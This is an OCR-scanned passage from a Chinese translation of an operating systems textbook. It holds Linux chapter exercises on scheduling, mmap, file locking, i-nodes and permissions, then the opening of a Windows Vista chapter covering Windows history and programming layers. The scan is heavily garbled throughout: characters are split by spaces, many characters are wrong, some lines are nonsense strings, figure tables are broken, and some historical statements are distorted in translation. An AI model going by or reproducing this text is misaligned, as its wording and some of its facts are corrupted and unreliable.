16.Linux 调 度 器 在 2.4 版 本 和 2.6 版 本 的 内 核 间 经 历 了 一 个 大 整修 。 现 
在 的 调度 器 可 以 在 OG) 时 间 做 出 调度 决定 。 请 解释 为 什么 会 这 样 ? 





17. 当 引导 Linux《〈 或 者 大 多 数 其 他 操作 系统 在 引导 时 ) 时 ， 在 0 号 而 
区 的 引导 加 载 程序 首先 加 载 一 个 引导 程序 ， 这 个 程序 之 后 会 加 载 操作 系 
统 。 这 多 余 的 一 步 为 什么 是 必 不 可 少 的 ? 0 号 忆 区 的 引导 加 载 程序 直接 
加 载 操作 系统 会 更 简单 的 。 





18. 某 个 编辑 器 有 100KB 的 程序 文本 ，30KB 的 初始 化 数据 和 50KB 的 
BSS。 和 初始 堆栈 是 10KB。 假 设 这 个 编辑 器 的 三 个 复制 是 同时 开始 的 。 
(a) 如 果 使 用 共享 文本 ， 需 要 多 少 物理 内 存 呢 ? Cb) 如 果 不 使 用 共享 
文本 又 需 多 少 物理 内 存 呢 ? 








19. 在 Linux 中 打开 文件 描述 符 表 为 什么 是 必要 的 呢 ? 


20. 在 Linux 中 ， 数 据 段 和 堆栈 段 被 分 页 并 交换 到 一 个 特别 的 分 页 磁 
盘 或 分 区 的 暂时 副本 上 ， 但 是 代码 段 却 使 用 了 可 执行 二 进 制 文件 。 为 什 


AN 





21. 描 述 一 种 使 用 mmap 和 信号 量 来 构造 一 个 进程 内 部 间 通 信 机 制 的 
方法 。 


22. 一 个 文件 使 用 如 下 的 mmap 系 统 调 用 映射 : 











mmap (65536, 32768,READ, FLAGS, fd,0) 





每 页 有 8KB。 当 在 内 存 地 址 72000 处 读 一 个 字 节 时 ， 访 问 的 是 文件 
中 的 哪个 学 市 ? 


23. 在 前 一 个 问题 的 系统 调用 执行 后 ， 执 行 munmap(65535,8192) 调 用 
会 成 功 吗 ?如 果 成 功 ， 文 件 的 哪些 字 节 会 保持 映射 ? 如 果 不 成 功 ， 为 什 


么 会 失败 ? 


24. 一 个 页 面 故障 会 导致 错误 进程 终止 吗 ? 如果 会 ， 举 一 个 例子 。 
如 果 不 会 ， 请 解释 原因 。 


25. 在 内 存 管 理 的 伙伴 系统 中 ， 两 个 相 邻 的 同样 大 小 的 空闲 内 存 块 
有 没有 可 能 同时 存在 而 不 会 被 合并 到 一 个 块 中 ? 如 果 有 解释 是 怎么 样 的 





情况 。 如 果 没 有 可 能 ， 说 明 为 什么 不 可 能 。 
26. 据 说 在 代码 段 中 分 页 分 区 要 比分 页 文件 性 能 更 好 。 为 什么 呢 ? 
27. 举 两 个 例子 说 明 相 对 路 径 名 比 绝对 路 径 名 有 优势。 


28. 以 下 的 加 锁 调用 是 由 一 个 进程 集合 产生 的 ， 对 于 每 个 调用 ， 说 
明 会 发生 什么 事情 。 如 果 一 个 进程 没 能 够 得 到 锁 ， 它 就 被 阻 奢 。 


a)A 想 要 0 到 10 字 节 处 的 一 把 共享 锁 。 
b)B 想 要 20 到 30 字 节 处 的 一 把 互 斥 锁 。 
OC 想 要 8 到 40 字 市 处 的 一 把 共享 锁 。 
d)A 想 要 25 到 35 字 节 处 的 一 把 共享 锁 。 
e)B 想 要 8 字 节 处 的 一 把 互 斥 锁 。 


29. 考 虑 图 10-26c 中 的 加 锁 文 件 。 假 设 一 个 进程 尝试 对 10 和 11 字 市 加 
BUR GRAZE. 那么 ， 在 C 释 放 它 的 锁 前 ， 还 有 男 一 个 进程 尝试 对 10 和 11 
字 节 加 锁 然 后 阻塞 。 在 这 种 情况 下 语义 方面 会 产生 什么 问题 ? 提出 两 种 
解决 方法 并 证 明 。 





30. 假 设 lseek 系 统 调用 在 一 个 文件 中 寻找 一 个 负 的 侦 移 量 。 给 出 两 
种 可 能 的 处 理 方法 。 


31. 如 果 一 个 Linux 文 件 拥有 保护 模式 755 八进制》， 文 件 所 有 者 、 
所 有 者 所 在 组 以 及 其 他 每 个 用 户 都 能 对 这 个 文件 做 什么 ? 


32. 一 些 磁带 驱动 拥有 编写 的 块 ， 能 够 在 原 地 重 写 一 个 特定 块 同时 
不 会 影响 它 之 前 和 之 后 的 块 。 这 样 一 个 设备 能 持 有 一 个 已 加 载 的 Linux 
文件 系统 吗 ? 





33. 在 图 10-24 中 链接 之 后 Fred 和 Lisa 在 他 们 各 自 的 目录 中 都 能 够 访问 
文件 x。 这 个 访问 是 完全 对 称 的 吗 ， 也 就 是 说 其 中 一 个 人 能 对 文件 做 的 
事情 另 一 个 人 也 可 以 做 ? 


34. 正 如 我 们 看 到 的 ， 绝 对 路 径 名 从 根 目 录 开 始 碍 找 ， 而 相对 路 径 
名 从 工作 目录 开始 查找 。 提 供 一 种 有 效 的 方法 实现 这 两 种 俘 找 。 





35. 当 文件 /usr/ast/worK/f 被 打开 ， 读 i 节点 和 目录 块 时 需要 一 些 磁 檀 
访问 。 在 根 节 点 的 i 节点 始终 在 内 存 中 以 及 所 有 的 目录 都 是 一 个 块 的 大 
小 这 样 的 假设 下 计算 需要 的 破 盘 访问 数量 。 








36. 一 个 Linux i 节点 有 12 个 磁盘 地 址 放 数 据 块 ， 还 有 一 级 、 二 级 和 三 
级 间接 块 。 如 果 每 一 个 块 能 放 256 个 磁盘 地 址 ， 假 设 一 个 磁盘 块 的 大 小 
是 1KB， 能 处 理 的 最 大 文件 的 大 小 是 多 少 ? 


37. 在 打开 文件 的 过 程 中 ，i 节 点 从 磁盘 中 被 读 出 ， 然 后 放 入 内 存 中 
的 i 节点 表 里 。 这 个 表 中 有 些 域 在 磁盘 中 没有 。 其 中 一 个 是 计数 占 ， 用 











来 记录 i 节点 已 经 被 打开 的 次 数 。 为 什么 需要 这 个 域 ? 


38. 在 多 CPU 平 台 上 ，Linux 为 每 个 CPU 维 护 一 个 runqueue。 这 是 个 
好 想法 吗 ? 请 解释 你 的 答案 


39.pdflush 线 程 可 以 被 周期 性 地 唤醒 ， 把 多 于 30 秒 的 旧 页 面 写 回 到 
磁盘 。 这 个 为 什么 是 必要 的 ? 





40. 在 系统 衣 温 并 重 局 后 ， 通 单一 个 恢复 程序 将 运行 。 假 设 这 个 程 
序 发 现 一 个 磁盘 i 节 点 的 连接 数 是 2， 但 是 只 有 一 个 目录 项 引用 了 这 个 
。 它 能 够 解决 这 个 问题 吗 ? 如 果 能 ， 该 怎么 做 ? 





41. 猜 一 下 哪个 Linux 系 统 调用 是 最 快 的 ? 


42. 对 一 个 从 来 没有 被 连接 的 文件 取消 连接 可 能 吗 ? 会 发 生 什么 ? 


43. 基 于 本 章 提 供 的 信息 ， 如 果 一 个 Linux ext2 文 件 系 统 放 在 一 个 
1.44MB 的 软盘 上 ， 用 户 文 件数 据 最 大 能 有 多 少 可 以 储存 在 这 个 盘 上 ? 
假设 磁盘 块 的 大 小 是 1KB。 


44. 考 虑 到 如 末 学 生成 为 超级 用 户 会 造成 的 所 有 了 麻烦， 为 什么 这 个 
概念 还 会 出 现 ? 


45. 一 个 教授 通过 把 文件 放 在 计算 机 科学 学 院 的 Linux 系 统 中 的 一 个 
公共 可 访问 的 目录 下 来 与 他 的 学 生 共 享 文件 。 一 天 他 意识 到 前 一 天 放 在 





那 的 一 个 文件 变 成 全 局 可 写 的 了 。 他 改变 了 权限 并 验证 了 这 个 文件 与 他 
的 原件 是 一 样 的 。 第 二 天 他 发 现 文件 已 经 被 修改 了 。 这 种 情况 为 什么 会 
发 生 ， 又 如 何 能 预防 呢 ? 


46.Linux 支 持 一 个 系统 调用 fsuid。setuid 准 许 使 用 者 拥有 与 他 运行 的 
程序 相关 的 有 效 id 的 所 有 权利 。 与 setuid 不 同 ，fsuid 准 许 正在 运行 程序 的 
使 用 者 拥有 特殊 的 权利 ， 只 能 够 访问 文件 。 这 个 特性 为 什么 有 用 ? 


47. 写 一 个 允许 简单 命令 执行 的 最 小 的 shell， 也 要 使 这 些 命令 能 在 后 


48. 使 用 汇编 语言 和 BIOS 调 用 ， 写 一 个 在 Pentinum 类 计算 机 上 从 软 
盘 上 引导 自己 的 程序 。 这 个 程序 应 该 使 用 BIOS 调 用 来 读 取 键 盘 以 及 回 
应 键入 的 字符 ， 只 是 证 明 这 个 程序 确实 在 运行 。 








49. 写 一 个 能 通过 串口 连接 两 台 Linux 计 算 机 的 哑 (dumb) Pate 
序 。 使 用 POSIX 终 端 管理 调用 来 配置 端口 。 


50. 写 一 个 客户 -服务 器 应 用 程序 ， 应 答 请 求 时 能 通过 套 接 字 传输 一 
个 大 文件 。 使 用 共享 内 存 的 方法 重新 实现 相同 的 应 用 程序 。 你 觉得 哪个 
版 本 性 能 更 好 ? 为 什么 ?使 用 你 写 好 的 代码 和 不 同 的 文件 大 小 进行 性 能 
的 训 量 。 你 观察 到 了 什么 ? 你 认为 在 Linux 内 核 中 发 生 了 什么 导致 这 样 
的 行为 ? 








51. 实 现 一 个 基本 的 用 户 级 线程 库 ， 该 线程 在 Linux 的 上 层 运 行 。 库 
的 API 应 该 包含 水 数 调 用 ， 如 mythreads_init、mythreads_create、 
mythreads_join、mythreads_exit、mythreads_yield、mythreads_self， 可 能 
还 有 一 些 其 他 的 。 进 一 步 实 现 这 些 同步 变量 ， 以 便 用 户 能 使 用 安全 的 并 
发 操作 : mythreads_mutex_init, mythreads_mutex_lock, 
mythreads_mnutex_unlock。 在 开始 前 ， 清 晰 地 定义 API 并 说 明 每 个 调用 的 
语义 。 接 大 使 用 简单 的 轮转 抢占 调度 器 实现 用 户 级 的 库 。 还 需要 利用 该 
库 编 写 一 个 或 更 多 的 多 线程 应 用 程序 ， 用 来 测试 线程 库 。 最 后 ， 用 男 一 
个 像 本 章 描述 的 Linux2.6 O(D) 的 调度 策略 蔡 换 简单 的 调度 策略 。 使 用 每 
种 调度 器 时 比较 你 的 应 用 程序 的 性 能 。 








第 11 章 ”实例 研究 2: Windows Vista 


Windows 是 一 个 现代 的 操作 系统 ， 可 以 运行 在 消费 型 或 商业 型 桌面 
计算 机 和 企业 服务 右上。 最 新 的 桌面 版 本 是 Windows Vistas Windows 
Vista 的 服务 器 版 本 称 为 Windows Server 2008。 在 本 章 中 我 们 将 分 析 
Windows Vista 的 各 个 方面 ， 从 历史 简 述 开始 ， 然 后 接 下 来 是 系统 的 架 
构 。 在 此 之 后 我 们 将 看 看 进程 、 内 存 管理 、 绥 存 、 输 入 /输出 、 文 件 系 
统 ， 最 终 我 们 还 将 关注 一 下 安全 。 


11.1 Windows Vista 的 历史 


微软 公司 为 桌面 计算 机 和 服务 器 开发 的 Windows 操 作 系统 可 以 划分 
为 三 个 时 代 : MS-DOS、 基 于 MS-DOS 的 Windows 和 基于 NT 的 
Windows。 从 技术 上 来 说 ， 以 上 的 每 一 种 系统 与 其 他 系统 都 有 本 质 的 不 
同 。 在 个 人 计算 机 历史 中 不 同 的 时 代 ， 每 一 种 系统 都 占据 了 主导 地 位 。 
图 11-1 显 示 的 是 微软 适用 于 桌面 计算 机 的 主要 操作 系统 的 发 布 日 期 (不 
包括 微软 为 UNIX 使 用 的 Xenix 版 本 ， 被 微软 于 1987 年 出 售 给 SCO〉。 以 
下 我 们 简要 描述 表 中 显示 出 的 每 个 时 代 。 
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图 11-1 微软 桌面 PC 的 主要 操作 系统 的 发 布 日 期 


11.1.1 20 世纪 80 年 代 : MS-DOS 


20 世 纪 80 初 期 的 IBM， 是 那 时 世界 上 最 大 和 最 强 的 计算 机 公司 ， 开 
发 出 基于 Intel 8088 微 处 理 器 的 个 人 计算 机 。 自 从 1970 年 中 期 开始 ， 微 软 
成 为 在 8080 和 Z-80 等 8 位 微 处 理 器 上 提供 BASIC 编 程 语言 的 领导 者 。 当 
IBM 接 洽 微 软 关 于 在 新 型 的 计算 机 上 授权 使 用 BASIC 的 时 候 ， 微 软 赞 同 
并 且 建 议 IBM 联 系 Digital Research 公 司 以 便于 使 用 它 的 CP/M 操 作 系 统 ， 
那 时 微软 还 没有 进入 操作 系统 领域 。IBM 这 样 做 了 ， 但 是 Digital 
Research 公 司 的 总 裁 Gary Kildall 非 常 繁忙 ， 没 有 时 间 与 BM 继续 商讨 ， 

所 以 IBM 转 回 到 微软 。 在 很 短 的 时 间 之 内 ， 微 软 从 一 家 本 地 公司 西雅图 
计算 机 产品 (Seatle Computer Products) 买 到 了 一 份 CP/M 的 拷贝 ， 移 植 到 
IBM PC 中 ， 并 且 授 权 IBM 使 用 。 这 个 产品 被 命名 为 MS-DOS 

1.0 (Microsoft Disk Operating System) 并 且 在 1981 年 与 第 一 款 IBM PC 一 
同 发 售 。 


MS-DOS 是 一 球 16 位 、 实 时 模式 、 单 一 用 户 、 命 令 行 式 的 操作 系 
统 ， 包 含 8KB 的 内 存 驻 留 编码 。 在 接 下 来 的 十 年 里 ，PC 和 MS-DOS 继 续 
发 展 ， 增 加 了 更 多 的 特性 和 性 能 。 在 1986 年 当 IBM 基 于 Intel 286 开 始 设 
计 PC/AT 时 ，MS-DOS 已 经 增长 到 36KB， 但 是 仍然 是 命令 行 式 ， 同 一 时 
刻 只 能 运行 一 个 应 用 程序 的 操作 系统 。 


11.1.2 20 世纪 90 年 代 : 基于 MS-DOS 的 Windows 


由 于 受到 了 斯 坦 福 研究 学 院 和 Xerox PARC 研 究 的 图 形 用 户 界面 的 
司 发 ， 以 及 他 们 取得 的 商业 产品 一 一 苹果 的 Lisa 和 Macintosh， 微 软 决定 
增加 MS-DOS 的 图 形 用 户 界面 ， 并 命名 为 Windows。Windows 最 初 的 两 
个 版 本 〈1985 和 1987) 并 不 非常 成 功 ， 因 为 它们 受到 了 那 时 的 PC 硬件 
的 限制 。 在 1990 年 微软 为 Intel 386 发 布 了 Windows 3.0 版 本 ， 并 且 在 六 个 
月 内 销售 了 一 百 万 份 拷贝 。 





Windows 3.0 不 是 一 球 真 正 的 操作 系统 ， 而 是 在 MS-DOS 上 应 用 了 图 
形 用 户 界 面 ， 它 仍然 受到 机 器 和 文件 系统 的 控制 。 所 有 的 程序 在 同一 地 
址 空间 内 运行 而 且 它 们 中 的 任何 一 处 bug 都 会 使 得 整个 系统 朋 涡 。 





在 1995 年 8 月 ，Windows 95 发 布 了 。 它 在 一 个 成 熟 的 系统 内 包括 了 
许多 特性 ， 包 括 虚 拟 内 存 、 进 程 管理 、 多 程序 设计 、32 位 的 程序 界面 。 
然而 ， 它 仍然 缺少 安全 性 ， 并 且 在 操作 系统 和 应 用 程序 之 间 提 供 了 很 少 
的 隔离 措施 。 因 此 这 些 不 稳定 的 问题 仍然 存在 ， 在 随后 发 布 的 Windows 
98 和 Windows Me 中 也 一 样 。 在 它们 中 MS-DOS 仍 然 以 16 位 汇编 编码 运行 
在 Windows 操 作 系 统 核 心中 。 





11.1.3 21 世纪 : 基于 NT 的 Windows 


在 20 世 纪 80 年 代 末 ， 微 软 认识 到 继续 开发 以 MS-DOS 为 核心 的 操作 
系统 不 是 一 个 最 佳 商 业 发 展 方向 。 计 算 机 硬件 在 不 断 地 提高 计算 速度 和 
能 力 ， 最 后 PC 市 场 会 出 现 同 桌面 工作 站 和 企业 服务 器 的 碰撞 ， 而 在 这 
些 领域 UNIX 操 作 系统 是 占 优势 的 。 微 软 同时 也 注意 到 Intel 微 处 理 器 家 
族 可 能 不 再 具有 很 大 的 竞争 优势 ， 因 为 它 已 经 受到 了 RISC 架 构 的 挑 
战 。 为 了 讨论 这 些 因 素 ， 微 软 从 DEC 公 司 招聘 了 一 些 由 Dave Cutler 带 领 
的 工程 师 ， 他 是 DEC 的 VMS 操 作 系 统 的 主要 架构 设计 者 。Cutler 被 指派 
开发 一 种 全 新 的 32 位 操作 系统 用 于 实现 OS/2， 微 软 当 时 联合 IBM 在 合作 
开发 OS/2 操 作 系 统 的 API 接 口 。 最 初 的 设计 文档 中 ，Cutler 的 团队 称 这 种 
操作 系统 为 NT OS/2。 

















Cutler 的 系统 由 于 包含 很 多 新 技术 被 称 作 NT (New Technology) 
(也 因为 最 初 的 目标 处 理 器 是 新 型 的 Intel 860 代 码 名 称 是 N10) 。NT 开 
发 的 重点 是 方便 地 在 不 同 的 处 理 器 之 间 切 换 和 着 重 在 安全 性 和 可 靠 性 方 
面 ， 它 同样 兼容 基于 MS-DOS 的 Windows 版 本 。Cutler 的 DEC 工作 背景 
现在 多 个 方面 ， 有 不 止 一 处 体现 出 NT 系统 的 设计 和 VMS 以 及 其 他 系统 
设计 的 相似 性 ， 如 图 11-2 所 示 。 








DEC 操作 系统 特性 
1973 RSX-11M 16 位 、 多 用 户 、 实 时 、 交 换 性 
1978 VAX/VMS 3247. KEI A 


1987 VAXELAN 实时 


1988 PRISM/Mica 在 MIPS/Ultrix 热 潮 中 被 取消 





图 11-2 由 Dave Cutler F R iy DECINE A A 


当 DEC 的 工程 师 (包括 后 来 的 律师 ) 看 到 NT 与 YMS 是 如 此 相似 时 

(也 包括 他 们 没有 发 布 的 版 本 MICA) ， 一 场 有 关于 微软 使 用 了 DEC 的 
知识 产权 的 争论 在 DEC 和 微软 之 间 展 开 了 。 最 终 的 结果 是 庭 外 和 解 。 另 
外 ， 微 软 同意 在 一 段 时 间 内 支持 NT 系统 在 DEC 的 Alpha 机 器 上 的 使 用 。 
然而 ， 这 些 都 不 能 把 DEC 从 它 在 微型 计算 机 上 的 错误 定位 和 轻视 个 人 计 
算 机 的 观点 中 挽救 回来 。 如 同 DEC 的 创始 者 Ken Olsen 在 1977 年 评论 
的 : “没有 人 会 想 要 在 家 里 拥有 计算 机 。” 这 使 得 DEC 在 1998 年 被 出 售 给 
康 柏 〈Compaq) ， 而 后 者 稍 后 又 被 惠普 〈Hewlett-Packard) 收购 。 








那些 仅仅 熟悉 UNIX 的 程序 员 发 现 NI 的 架构 非常 不 同 。 这 不 仅仅 是 
因为 受到 了 VMS 的 影响 ， 也 是 因为 在 当时 计算 机 系统 的 不 同 导致 设计 不 
同 。UNIX 是 在 20 世 纪 70 年 代为 单 处 理 右 、16 位 、 微 内 存 、 切 换 系 统 设 
计 的 ， 那 时 进程 是 最 小 的 并 行 和 组 成 单元 。 而 且 fork/exec 是 并 不 消耗 很 
多 资源 的 操作 命令 (因为 切换 系统 经 常 被 通过 磁盘 拷贝 ) 。NT 是 在 20 
世纪 90 年 代 初期 设计 的 ， 当 时 多 处 理 器 、32 位 、 大 容量 存储 、 虚 拟 内 存 











系统 已 经 非 第 普及 。 在 NT 系统 中 ， 线 程 是 并 行 单元 ， 动 态 连 接 库 是 组 
成 的 单元 ， 并 且 fork/exec 是 被 通过 单一 操作 命令 来 实现 创建 一 个 全 新 的 
进程 ， 然 后 运行 为 外 一 个 程序 而 不 需要 首先 复制 一 个 拷贝 。 








第 一 个 基于 NT 的 Windows 版 本 (Windows NT 3.1) 在 1993 年 发 布 ， 
它 被 称 作 3.1 是 因为 那 时 的 消费 版 本 是 3.1。 与 IBM 合 作 开发 的 版 本 也 建 
立 了 ， 虽 然 0S/2 的 界面 仍然 被 支持 ，Windows API 的 32 位 扩展 称 为 
Win32。 在 生产 和 销售 NT 的 那 段 时 间 里 ，Windows 3.0 发 布 了 ， 并 且 在 
商业 上 取得 了 成 功 。 它 不 仅 可 以 运行 Win32 程 序 ， 并 且 使 用 Win32 兼 容 
库 。 








就 像 基 于 MS-DOS 的 Windows 的 最 初版 本 一 样 ， 基 于 NT 的 Windows 
的 最 初版 本 也 不 是 完全 成 功 的 。NT 需 要 更 多 的 内 存 ， 那 时 只 有 很 少 的 
32 位 应 用 程序 。 并 且 与 设备 驱动 和 应 用 程序 的 不 兼容 使 得 许多 消费 者 重 
新 回 到 微软 仍 在 改进 的 基于 MS-DOS 的 Windows 一 一 发 布 于 1995 年 的 
Windows 95。Windows 95 提 供 像 NT 一 样 的 本 地 的 32 位 程序 界面 ， 但 是 
与 现存 的 16 位 程序 和 应 用 软件 有 更 好 的 兼容 性 。 并 不 使 人 惊奇 的 是 ， 
NT 的 早期 成 功 是 在 服务 器 市 场 与 YMS 和 NetWare 的 竞争 中 。 











NT 确实 达到 了 可 移植 性 的 目标 ， 在 后 续 的 1994 和 1995 年 发 布 的 版 
本 中 增加 了 对 (小 指令 字 节 )MIPS 和 Power PC 架构 的 支持 。NT 最 初 最 主 
要 的 升级 是 在 1996 年 升级 成 为 Windows NT 4.0。 这 个 系统 包含 了 性 能 、 
安全 性 和 可 靠 性 ， 也 拥有 跟 Windows 95 同 样 的 用 户 界面 。 


图 11-3 显 示 了 Win32 API 和 Windows 之 间 的 关系 。 具 有 通用 的 API 接 
口 的 基于 MS-DOS 的 Windows 和 基于 NT 的 Windows 促 成 了 NT 的 成 功 。 





Win 32 应 用 程序 界面 


Windows Windows95/ 
3.x 98/98SE/Me 


图 11-3 Win32 API 接口 允许 程序 在 几乎 所 有 版 本 的 Windows 上 运行 
















Windows NT/ 
2000/XP/Vista 





这 种 兼容 性 使 得 用 户 可 以 方便 地 从 Windows 95 移 植 到 NT， 操 作 系 
统 也 在 高 端的 计算 机 市 场 上 比如 说 服务 器 领域 中 扮演 了 很 重要 的 角色 。 
然而 ， 用 户 并 不 急切 地 希望 接纳 其 他 处 理 器 架构 ， 在 1996 年 Windows 
NT 支持 的 四 种 架构 中 (在 这 个 版 本 中 增加 了 对 DEC Alpha 的 支持 ) ， 只 
有 x86〔 就 是 奔腾 家 族 ) 在 下 一 个 主要 的 发 布 一 一 Windows 2000 中 被 着 
重地 文 持 。 








Windows 2000 代 表 了 NT 的 重大 进化 。 增 加 的 关键 技术 包括 即 插 即 
用 功能 〈( 当 使 用 者 要 安装 新 的 PCI 卡 时 ， 不 再 需要 更 改 跳 线 ) 、 网 络 目 


录 服 务 〈 对 于 企业 用 户 ) 、 改 进 的 电源 管理 〈 对 于 笔记 本 用 户 ) 和 改进 
的 GUI (对 于 任何 用 户 〉。 


Windows 2000 技 术 上 的 成 功 ， 领 导 着 微软 继续 朝 着 通过 提高 应 用 程 
序 和 设备 的 兼容 性 来 引导 下 一 个 系统 Windows XP， 而 Windows 98 则 逐 
步 淡出 市 场 。Windows XP 包含 了 一 个 更 加 友好 的 外 观 及 感觉 的 图 形 界 
面 ， 更 加 增强 了 微软 关于 关联 消费 者 以 及 增加 了 消费 者 推动 他 们 的 雇主 
来 接纳 他 们 已 经 熟悉 的 环境 的 销售 策略 。 这 一 策略 获得 了 压倒 性 的 成 
功 ， 在 最 初 的 几 年 里 ，Windows XP 被 安装 在 成 干 上 万 台 计 算 机 上 ， 这 
使 得 微软 成 功 实现 了 有 效 地 结束 基于 MS-DOS 的 Windows 系 统 这 个 目 


标 。 





Windows XP 代表 着 微软 的 一 种 新 的 发 展 路 径 ， 为 桌面 用 户 和 企业 
用 户 发 布 了 不 同 的 版 本 。Windows XP 系统 太 复杂 以 至 于 不 能 同时 提供 
高 质量 的 客户 端 以 及 服务 器 发 布 。Windows 2003 服 务 器 版 本 是 Windows 
XP 客 户 端 操作 系统 的 补充 ， 它 提供 了 对 Intel 64 位 安 腾 处 理 器 的 支持 ， 
并 且 在 它 的 第 一 个 补丁 包 中 ， 对 AMD x64 架 构 的 服务 器 和 客户 机 都 提供 
了 支持 。 微 软 利 用 用 户 版 本 和 企业 版 本 不 同 的 发 布 时 间 来 增加 服务 器 特 
性 ， 引 导 在 商业 主要 应 用 的 测试 。 图 11-4 显 示 了 Windows 用 户 版 本 和 服 
务 器 版 本 的 关系 。 





Windows NT 1996 Windows NT Server 


用 户 版 本 服务 器 版 本 
Windows 2000 1999 Windows 2000 Server 





4 Wg AS 
Windows XP Windows Server 2003 
2007 Windows Server 2008 


图 11-4 Windows 用 户 版 本 和 服务 器 版 本 在 不 同时 间 发 布 


微软 紧 跟 着 Windows XP 后 面 的 是 一 个 雄心 描 过 的 发 布 ， 令 PC 消费 
者 兴奋 的 全 新 体验 。 最 终 的 结果 ，Windows Vista， 在 2006 年 下 半年 完 
成 ， 距 离 Windows XP 发 布 大 约 五 年 。Windows Vista 声 称 有 全 新 开发 的 
图 形 用 户 界 面 ， 新 的 安全 特性 。 大 多 数 改变 是 在 使 用 者 的 可 视 化 经 验 和 
兼容 性 方面 。 系 统 内 部 的 技术 大 幅度 地 提高 了 ， 进 行 了 很 多 内 部 编码 优 
化 和 许多 在 界面 上 的 改善 、 可 测量 性 和 可 信赖 性 。Vista 的 服务 器 版 本 
(Windows Server 2008) 在 用 户 版 本 的 一 年 之 后 发 布 ， 它 分 至 了 同样 的 
系统 内 核 ， 例 如 核心 、 驱 动 、 底 层 库 和 程序 。 











关于 早期 开发 NT 的 人 物 历史 在 一 本 书 《Show stopper) H 
(Zachary 1994) 里 有 相关 的 介绍 。 书 中 讲述 到 很 多 关键 的 人 物 ， 以 及 
在 如 此 庞大 的 软件 开发 工程 中 所 经 历 的 困难 。 





[1] ”本 书 中 文 版 已 由 机 械 工 业 出 版 社 引 进出 版 ， 书 名 为 《 观 止 一 一 微软 
创建 NT 和 未 来 的 李 命 狂奔 》， 书 号 为 ISBN 978-7-111-26530-6。 编辑 
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11.1.4 Windows Vista 





Windows Vistai& FI T žk AAT Aki A ERE ASIN UE. By 
初 的 计划 太 过 于 激进 以 至 于 头 几 年 的 Vista 开 发 必须 以 更 小 的 范畴 重新 开 
始 。 计 划 严 重 依赖 于 包括 微软 的 类 型 安全 、 垃 圾 回收 、.NET 语 言 C# 等 
在 内 的 技术 ， 以 及 一 些 有 意义 的 特性 ， 例 如 统一 存储 系统 用 来 从 多 种 不 
同 的 来 源 中 搜索 和 组 织 数据 的 WinFS。 整 个 操作 系统 的 规模 是 相当 惊人 
的 。 最 早 NT 系 统 发 行 时 只 有 300 万 条 C/C++ 语句 ， 到 NT4 时 增长 到 1600 
万 ，2000 是 3000 万 ，XP 是 5000 万 ， 而 到 了 Vista 已 经 超过 了 7000 万 。 








规模 增 大 的 大 部 分 原因 是 每 次 微软 公司 在 发 行 新 版 本 时 都 增加 一 些 
新 功能 。 在 system32 的 主 目 录 中 ， 含有 1600 个 动态 链接 库 (DLL) 和 
400 个 可 执行 文件 (EXE) ， 而 这 还 不 包含 让 用 户 网 上 冲浪 、 播 放 音乐 
和 视频 、 发 电子 邮件 、 浏 览 文件 、 整 理 照片 甚至 制作 电影 各 种 各 样 应 用 
程序 的 目录 。 但 是 微软 想 让 客户 使 用 新 版 本 ， 所 以 它 兼 容 了 老 版 本 的 所 
有 特征 ， 应 用 程序 界面 API、 程 序 〈 小 的 应 用 软件 ) 等 。 几 乎 很 少 有 功 
能 被 删 掉 。 结 果 随 着 版 本 的 升级 Windows 系 统 越 来 越 大 。 随 着 科技 发 
展 ，Windows 发 布 的 载体 也 从 软驱 ，CD 发 展 到 现在 的 Windows Vista E 
的 DVD。 








随 看 Windows 上 层 功 能 和 程序 的 脱 胀 使 得 和 其 他 操作 系统 在 有 效 大 





小 上 的 比较 成 问题 ， 因 为 很 难 定 义 某 一 部 分 是 否 属 于 操作 系统 。 在 操作 
系统 的 下 层 ， 因 为 执行 相关 联 的 功能 ， 所 以 通信 比较 频繁 。 即 使 如 此 我 
们 也 能 看 到 在 不 同 的 Windows 之 间 也 有 很 大 的 不 同 。 图 11-5 比 较 了 
Windows 和 Linux 的 核心 在 CPU 调 度 、LO 设 备 和 虚拟 内 存 三 个 主要 功能 
方面 的 区 别 。Windows 中 前 两 部 分 是 Linux 的 一 半 大 小 ， 但 是 虚拟 内 存 
部 分 要 大 一 个 数量 级 一 一 因为 有 大 量 的 功能 ， 虚 拟 内 存 模 型 实现 技术 需 











要 大 量 代码 实现 高 速 运行 。 


PP 
CPU 调度 器 50 000 75 000 


IO 基础 设施 45 000 60 000 
虚拟 内 存 25 000 175 000 
图 11-5 对 Windows 和 Linux 中 选 定 内 核 模 块 的 代码 行 数 (LOC) 比 较 


(来 自 Microsoft Windows Internals 的 作者 Mark Russinovich) 





11.2 Windows Vista 编 程 


现在 开始 Windows Vista 的 技术 研究 。 但 是 ， 在 研究 详细 的 内 部 结构 
之 前 ， 我 们 首先 看 看 系统 调用 的 本 地 NT API 和 Win32 编 程 子 系统 。 尽 管 
有 可 移植 操作 系统 接口 (POSIX) ， 但 实际 上 为 Windows 编 写 的 代码 不 
是 Win32 就 是 .NET， 其 中 .NET 本 身 也 是 运行 在 win32 之 上 的 。 


图 11-6 介 绍 的 是 windows 操 作 系 统 的 各 个 层次 。 在 Windows 应 用 程 
序 和 图 形 层 下 面 是 构造 应 用 程序 的 程序 接口 。 和 大 多 数 操作 系统 一 样 ， 
这 些 接口 主要 包括 了 代码 库 (DLL) ， 这 些 代 码 库 可 以 被 应 用 程序 动态 
链接 以 访问 操作 系统 功能 。Windows 也 包含 一 些 被 实现 为 单独 运行 进程 
的 服务 的 应 用 程序 接口 。 应 用 软件 通过 远程 过 程 调 用 (RPC) 与 用 户 态 
服务 进行 通信 。 








Applets (小 型 Win32 可 执行 程序 ) 


NT 服务 ; GUI(shell32.dll, user32.dll, gdi32.dll) 


smss, lsass,services, 动态 库 (ole32.dll,rpc.d1l) 


1 Pie. gf 进程 Srss 
Waa ON 7 RRAP(Kkemel32.dl, advapi32.dl,-h|| T *REECsrss) 


本 地 NT API，C/C++ 运 行 时 Cntdll.dlD 
内 核 态 NTOS 内 核 层 


GUI 驱动 
NTOS 执 行 体 (ntoskrnl. 
执行 体 (ntoskrnl.exe) (Win32k.sys) 


硬件 抽象 层 HAL (hal.dll) 











图 11-6 Windows 的 编程 层 


NT 操作 系统 的 核心 是 NTOS 内 核 态 程序 (ntoskrnl.exe) ， 它 提供 了 
操作 系统 的 其 他 部 分 的 实现 所 依赖 的 传统 的 系统 调用 接口 。 在 Windows 
中 ， 只 有 微软 的 程序 员 编 写 系统 调用 层 。 已 经 公开 的 用 户 态 接口 属于 操 
作 系 统 本 身 ， 它 通过 运行 在 NTOS 层 顶层 的 子 系统 (subsystem) 来 实现 
的 。 


